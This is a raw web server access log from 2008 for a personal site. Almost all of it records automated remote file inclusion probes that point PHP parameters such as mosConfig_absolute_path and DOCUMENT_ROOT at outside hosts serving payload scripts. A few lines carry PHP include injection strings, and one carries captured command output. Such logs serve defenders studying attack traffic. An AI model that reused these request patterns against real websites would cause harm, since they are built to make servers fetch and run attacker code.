66.135.59.180 - - [03/Aug/2008:21:17:06 -0700] "GET /logs/access_080609.log/index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.135.59.180 - - [03/Aug/2008:21:17:06 -0700] "GET /index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.135.59.180 - - [03/Aug/2008:21:17:06 -0700] "GET /logs/index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.135.59.180 - - [03/Aug/2008:21:17:12 -0700] "GET /logs/access_080602.log/index2.php?root_PATH=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.135.59.180 - - [03/Aug/2008:21:18:35 -0700] "GET /logs/access_080623.log/index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.135.59.180 - - [03/Aug/2008:21:18:35 -0700] "GET /index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.135.59.180 - - [03/Aug/2008:21:18:35 -0700] "GET /logs/index5.php?pagina=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:21:22:09 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:21:22:09 -0700] "GET /logs///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.aliirwin.com"
194.79.75.195 - - [03/Aug/2008:21:27:27 -0700] "GET /logs/errors.php?error=http://www.dogshop.at/poll/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.aliirwin.com"
194.79.75.195 - - [03/Aug/2008:21:27:27 -0700] "GET /errors.php?error=http://www.dogshop.at/poll/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:21:34:52 -0700] "GET /logs///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:21:34:53 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.aliirwin.com"
209.97.201.148 - - [03/Aug/2008:21:36:47 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
209.97.201.148 - - [03/Aug/2008:21:36:47 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
209.97.201.148 - - [03/Aug/2008:21:36:47 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
209.97.201.148 - - [03/Aug/2008:21:36:56 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
218.38.54.160 - - [03/Aug/2008:21:44:49 -0700] "GET /errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:21:48:46 -0700] "GET //index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:21:48:48 -0700] "GET /logs//index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.aliirwin.com"
74.6.18.244 - - [03/Aug/2008:21:53:58 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
209.172.55.13 - - [03/Aug/2008:21:54:37 -0700] "GET //ashnews.php?pathtoashnews=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.aliirwin.com"
59.106.19.213 - - [03/Aug/2008:21:55:57 -0700] "GET /logs/access_080609.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
59.106.19.213 - - [03/Aug/2008:21:55:57 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
59.106.19.213 - - [03/Aug/2008:21:55:57 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
59.106.19.213 - - [03/Aug/2008:21:56:33 -0700] "GET /logs/access_080526.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
218.38.54.160 - - [03/Aug/2008:22:00:53 -0700] "GET /logs/access_080616.log/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
218.38.54.160 - - [03/Aug/2008:22:00:54 -0700] "GET /errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
218.38.54.160 - - [03/Aug/2008:22:00:55 -0700] "GET /logs/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
217.20.175.69 - - [03/Aug/2008:22:00:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:01:34 -0700] "GET //config/dbutil.bck.php?confdir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
217.20.175.69 - - [03/Aug/2008:22:04:12 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
206.71.148.152 - - [03/Aug/2008:22:04:31 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
82.177.58.11 - - [03/Aug/2008:22:06:14 -0700] "GET /logs/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
82.177.58.11 - - [03/Aug/2008:22:06:14 -0700] "GET /errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:06:21 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
209.172.55.13 - - [03/Aug/2008:22:07:23 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:12:51 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
217.20.175.69 - - [03/Aug/2008:22:13:15 -0700] "GET //include/lib.inc.php?site_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
77.91.224.11 - - [03/Aug/2008:22:13:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.aliirwin.com"
77.91.224.11 - - [03/Aug/2008:22:13:48 -0700] "GET / HTTP/1.1" 200 779 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:14:38 -0700] "GET /errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:16:37 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
217.20.175.69 - - [03/Aug/2008:22:16:51 -0700] "GET ///vwar/backup/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:22:18:32 -0700] "GET /logs/access_080519.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:22:18:32 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:22:18:33 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:22:19:03 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
206.71.148.152 - - [03/Aug/2008:22:19:43 -0700] "GET /errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:19:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
75.101.157.249 - - [03/Aug/2008:22:23:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://vietnamsinglesclub.taivietnam.com/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.aliirwin.com"
69.13.27.210 - - [03/Aug/2008:22:23:11 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
81.25.54.205 - - [03/Aug/2008:22:24:04 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:24:48 -0700] "GET /logs/access_080519.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:24:49 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:24:50 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
206.71.148.152 - - [03/Aug/2008:22:25:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:26:16 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:22:29:20 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:22:29:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:22:29:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
203.22.204.92 - - [03/Aug/2008:22:29:56 -0700] "GET /errors.php?error=uid=11074(sawindham)%20gid=10001(psacln)%20groups=10001(psacln),%2080(www),%209999(custwww)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
218.38.54.160 - - [03/Aug/2008:22:30:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
217.20.175.69 - - [03/Aug/2008:22:35:34 -0700] "GET /errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
82.177.58.11 - - [03/Aug/2008:22:38:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
82.177.58.11 - - [03/Aug/2008:22:38:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
75.101.157.249 - - [03/Aug/2008:22:39:38 -0700] "GET //function.LoadModuleEnv//index.php?DOCUMENT_ROOT=http://vietnamsinglesclub.taivietnam.com/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:22:42:55 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:22:43:00 -0700] "GET //Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:22:43:00 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
74.6.18.244 - - [03/Aug/2008:22:45:46 -0700] "GET /logs/access_080526.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
69.90.47.14 - - [03/Aug/2008:22:48:25 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://uaedesign.com/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.aliirwin.com"
69.90.47.14 - - [03/Aug/2008:22:48:25 -0700] "GET //index.php?DOCUMENT_ROOT=http://uaedesign.com/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.aliirwin.com"
69.90.47.14 - - [03/Aug/2008:22:48:25 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://uaedesign.com/config/idfx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.aliirwin.com"
218.38.54.160 - - [03/Aug/2008:22:52:26 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
208.75.225.10 - - [03/Aug/2008:22:52:42 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:55:02 -0700] "GET /logs/access_080519.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:55:02 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:55:03 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
206.71.148.152 - - [03/Aug/2008:22:56:50 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
206.71.148.152 - - [03/Aug/2008:22:56:50 -0700] "GET /logs/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
206.71.148.152 - - [03/Aug/2008:22:57:25 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:58:00 -0700] "GET /logs/access_080526.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:58:19 -0700] "GET /logs/access_080519.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:58:20 -0700] "GET //Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.29.72.51 - - [03/Aug/2008:22:58:20 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:23:00:37 -0700] "GET /logs///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.aliirwin.com"
81.21.79.61 - - [03/Aug/2008:23:00:40 -0700] "GET ///index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://ahoic.com/logo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:00:51 -0700] "GET /logs/access.log//vwar/backup/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:00:51 -0700] "GET //vwar/backup/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:00:51 -0700] "GET /logs//vwar/backup/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
195.39.5.203 - - [03/Aug/2008:23:05:10 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [03/Aug/2008:23:05:18 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [03/Aug/2008:23:05:19 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:08:28 -0700] "GET /logs/access_080519.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:08:29 -0700] "GET //Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:08:29 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
82.177.58.11 - - [03/Aug/2008:23:09:37 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
82.177.58.11 - - [03/Aug/2008:23:09:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
217.20.175.69 - - [03/Aug/2008:23:12:48 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:17:48 -0700] "GET /logs/access_080623.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:21:25 -0700] "GET /logs/access_080519.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:21:25 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:21:25 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:27:14 -0700] "GET /logs/access_080526.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
80.51.119.2 - - [03/Aug/2008:23:28:23 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
213.193.229.39 - - [03/Aug/2008:23:28:26 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:28:42 -0700] "GET /logs/access_080519.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:28:47 -0700] "GET //Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [03/Aug/2008:23:28:48 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:30:29 -0700] "GET /logs/access_080519.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:30:29 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:30:29 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
77.92.80.1 - - [03/Aug/2008:23:34:14 -0700] "GET /logs/access_080526.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
193.189.149.55 - - [03/Aug/2008:23:36:09 -0700] "GET //index.php?DOCUMENT_ROOT=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
213.193.229.39 - - [03/Aug/2008:23:36:22 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
193.189.149.55 - - [03/Aug/2008:23:36:25 -0700] "GET /?DOCUMENT_ROOT=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.aliirwin.com"
80.51.119.2 - - [03/Aug/2008:23:38:54 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
